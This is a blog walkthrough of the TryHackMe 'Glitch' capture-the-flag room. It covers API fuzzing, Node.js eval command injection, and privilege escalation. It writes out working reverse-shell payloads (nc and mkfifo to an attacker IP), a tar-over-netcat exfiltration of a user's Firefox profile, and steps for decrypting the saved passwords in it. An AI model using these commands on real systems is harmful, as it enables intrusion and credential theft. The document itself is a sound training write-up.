The platform develops virtua l
classrooms that not only allow users to deploy training environments with the
click of a button, but also reinforce learning by adding a question-answer
approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Glitch Walkthrough
While using a question-answer model
does make learning easier, TryHackMe allows users to create their own virtual
classrooms to teach particular topics enabling them to become teachers. This
not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
Good day hacker, Spend more time in the CLI as much as you can, For that’s
where we belong.
Glitch is a easy machine from TryHackMe that
proves your ability to enumerate quickly and proves the solidification of your
methodology.TryHackMe Glitch Walkthrough
Security Problem
The app is vulnerable to command injection/execuiton via the usage of
eval. The exploit code can be passed to eval and executed, so the root of the
problem is is bad programming practice in Node.js, that allows an
unpriviledged user to supply data which will be executed on the server.
Let's
start with a quick comprehensive nmap scan
Here we can say that the room will turn around a website as the
port 80 is open.
Now let's run gobuster to enumerate all the directories
Let’s check what is the content of this website. The page is quite empty, and
we can check the source code of the page but it is quite empty as well. For
curiosity, I also checked the cookies.
Something looks strange here… The website sent me a cookie
with the value “value”, which is weird. Ok, let’s keep it in mind!
Gobuster says that there a directory /secret. Let’ check this
page and the source code of the page:
The page itself doesn’t have a lot of content. However, in the source code we
see a JavaScript and a getAccess to an API. Let’s check this:
Hmm interesting! When we check this endpoint, we have a token. It looks
encrypted on base64, let’s decrypt it.
Perfect, we have our first flag and a token !
Let’s try to change the value of the cookie with this token and refresh the
page:
Amazing! The home page changed as well.
Let’s check the page and
its source code:
The page doesn’t have a lot of information but in the source code we can find
a JavaScript file => script.js. Let’s check what this script does:
Basically, here the script will take items in the API and show it in the
browser. Let’s check those items => http://ipmachine/api/items
We don’t have a lot of information here either. I will be
clear with you, I got stuck for a while trying to figure out what is the next
step.
Finally, I decided to take a hint.
The hint says that we should try another API method.
As a beginner, I never played with API before. So, the only
solution was to try to read and learn about API and the way that they work.
Most
of the time, an API works with GET, POST, DELETE, and so on. The hint says
that we need to play around with those methods.
In order to change
the method, I used Burp.
First let’s intercept the request.
Turn Intercept On
Go to http://ipmachine/api/items
You can see here that the method is GET. Let’s change GET to OPTIONS, to see
all the options that we can use with this API endpoint (send what you
intercepted to Repeater):
Basically here, we have 3 methods that we can play around with this endpoint:
GET, HEAD and POST. We know already the result for GET. We don’t have results
for HEAD. Let’s try POST:
Hmm… I think we have something here, right? Someone put intentionally this
message there. Maybe we are in the good way.
From here, I
needed to read more about APIs and the way that they work. If you are new as
me, I will summarize what I learned about it and explain in an easy way:
API
The
basic goal of an API is to communicate with another application. In order, to
receive an information we use the method GET. However, if we want to send an
information, we will use POST method.
A quick example: let’s
say we want to buy a BWM car and we go to a website where contains a search
bar and we want to send a request to see all the “BMW” cars that they have in
stock. Here in this example, their site communicate with another application
to show the stock. The value of our search is “BMW” and the name of the
variable is “cars”. The request that we will send to this API will look like
this:
http://ipmachine/api/items?cars=BMW
Good, we know the structure of the request, but we don’t
really know what is the POST request that we need to send. We will need to
discover what come after “items?” (the variable “cars” in my example). To find
out this we can fuzz this request and see the POST responses. In order to
this, I will use wfuzz.
PS: Just to illustrate my
example, I will put the value that we expect as “bwm”:
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST — hh
45 -u http://IPMACHINE/api/items\?FUZZ\=bwm
- · -c: flag is used to show the output in colors
- · -z: to specify the payload list.
-
· — hh 45: When we sent the POST request through burp, we saw that the
content length of the “matrix message” was 45. In order to not show anymore
this response, I put –hh 45. Basically here, wfuzz will hide all responses
containing 45 characters. Indeed, this matrix message doesn’t have any value
for us.
- · -u: the url that you need to fuzz.
You can see that we found a “cmd” variable that gives us an error 500.
Basically, our request will look like this:
http://IPMACHINE/api/items?cmd=...
Let’s
send this new POST request and see the result:
Interesting! We got an error but we have some extra information. The value
“bwm” is executed in the eval function. We can also see that they used NodeJS
to build the room.
In this part, I got stuck again… So, I
told to myself: “Ok this room asks us to find the content of user.txt and
root.txt. So, I can suppose that we will, in a certain way, have a RCE
somewhere, right? Indeed, it is the only way because it is not possible to ssh
in this room.
I tried to google something like API RCE, API
reverse shell, etc. I didn’t find anything. Then I tried NodeJS RCE and I
found this
writeup.Here CurlS explains the way that she got
a reverse shell playing around an API. So I tried sending a new POST request
with her payload (you need to open a listener on your machine first):
POST
REQUEST =>
/api/items?cmd=require(“child_process”).exec(‘nc+IPOFYOURMACHINE+1234+-e+/bin/sh’)
Hmm… it looks very good! However, nothing happened to my listener. It looks
like the payload didn’t really work but the website says that we exploited the
vulnerability. Really weird, right?
But don't let's move to the curl tool
curl -X POST <machine ip>/api/items\?cmd\=ls
<title>Error</title>
So it's a Node.JS. Maybe I can get rce by Node.js eval ...
Reverse
shell payload :- Click Here
Node JS Reverse
shell payload :- Click Here
cmd=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ')
OR
require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ')
First, I must encode the payload as a URL, and then It's good to go
%63%6d%64%3d%72%65%71%75%69%72%65%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%38%2e%36%31%2e%32%33%34%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%20%27%29%0a%0a
After decoding let's take reverse shell via curl in terminal
This shell is a bit ugly, let’s change it =>
python3 -c 'import pty;pty.spawn("/bin/bash")'
Let’s find user.txt file. Most of the time, we can find this file in
the home directory of the user. Let’s check there first:
Perfect, we just found the second flag. Now we need to find a way to
escalate the privilege to get root and then read the file root.txt.
When we visit the home folder, we can see that there is another user: v0id.
Let’s check what he has in his folder:
Nothing interesting here…
Let’s
list all the users:
We can see here that we have 3 users that we could exploit: user (we
exploited already), v0id and root.
Our goal now is to find a way to escalate our privilege:
- · horizontally (to v0id)
- · vertically (to root).
First, let’s try “sudo -l”… It doesn’t work. We need to find another way.
Let’s go
back to the user’s home directory and check what is inside:
There is a .firefox directory hidden there. Basically, this directory could
contain passwords saved on Firefox Browser. Maybe we can try to find something
there.
A few months ago, I read that it is possible to
decrypt the content of this file. Let’s transfer this folder .firefox to our
machine then decrypt it.
In the target machine, connect back
to your machine. In order to do that, go to the /home/user/.firefox then
connect back to your machine from there. This will give you access (in your
machine) to all the content of .firefox directory.
In the
ROOM Machine:
cd /home/user/.firefox
tar cf — .firefox/ | nc IPOfYourMachine 1234
and
in my machine we run a command
nc -lvnp 1234 > out.tar
then, lets extract the file
tar xvf out.tar
Now we need to change the file permission to make it executable.
as you can see our file is extracted here...
In order to find all the hidden information in this directory, we can use a script created by unode => Link GitHub
Github File Here :- Click Here
Clone this script to your machine:
Now let’s decrypt the b5w4643p.default-release file:
our file is glitch-tryhackme inside that's why we used " ../ "
../.firefox/b5w4643p.default-release
Hmm interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to login in his linux machine? Let’s try to switch to his user:
Good, we just escalated (horizontally) the privileges to v0id user. Now let’s find a way to escalate the privilege (vertically) to the root user.
Let’s check the basic things (as it is an “easy” room) such as: sudo -l, cron jobs, etc/shadow, etc… Nothing special there. I also run linpeas to check if there is something interesting, but I couldn’t find anything. I got stuck here for a while…
Let’s take the last hint of the room: My friend says that sudo is bloat.
I didn’t have any idea what it means, so I googled it and I found this video :
Sudo Is Bloat. Use Doas Instead => Link of the YouTube Video
Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn’t work.
In the video, it says that we can use doas instead of sudo. So let’s try it:
Finally, we got root. Let’s check the root.txt, most of the time this file is in root folder.
After several hours of trying and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!
Things that we could learn during this room:
- · Find information in JavaScript code
-
- · How API works
-
- · Fuzz an URL with wfuzz
-
- · RCE through NodeJS
-
- · Find passwords hidden on Firefox folder.
-
- · Another alternative for sudo (doas)
In my option, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).
Disclaimer
This was written for educational purpose and pentest only.
The author will
not be responsible for any damage ..!
The author of this tool is not
responsible for any misuse of the information.
You will not misuse the
information to gain unauthorized access.
This information shall only be
used to expand knowledge and not for causing malicious or damaging
attacks. Performing any hacks without written permission is illegal ..!
All
video’s and tutorials are for informational and educational purposes only. We
believe that ethical hacking, information security and cyber security should be
familiar subjects to anyone using digital information and computers. We believe
that it is impossible to defend yourself from hackers without knowing how
hacking is done. The tutorials and videos provided on www.hackingtruth.in is
only for those who are interested to learn about Ethical Hacking, Security,
Penetration Testing and malware analysis. Hacking tutorials is against misuse of
the information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word is
used.
All tutorials and videos have been made using our own
routers, servers, websites and other resources, they do not contain any illegal
activity. We do not promote, encourage, support or excite any illegal activity
or hacking without written permission in general. We want to raise security
awareness and inform our readers on how to prevent themselves from being a
victim of hackers. If you plan to use the information for illegal purposes,
please leave this website now. We cannot be held responsible for any misuse of
the given information.
- Hacking Truth by Kumar Atul
Jaiswal
I hope you liked this post, then you should not
forget to share this post at all.
Thank you so much :-)
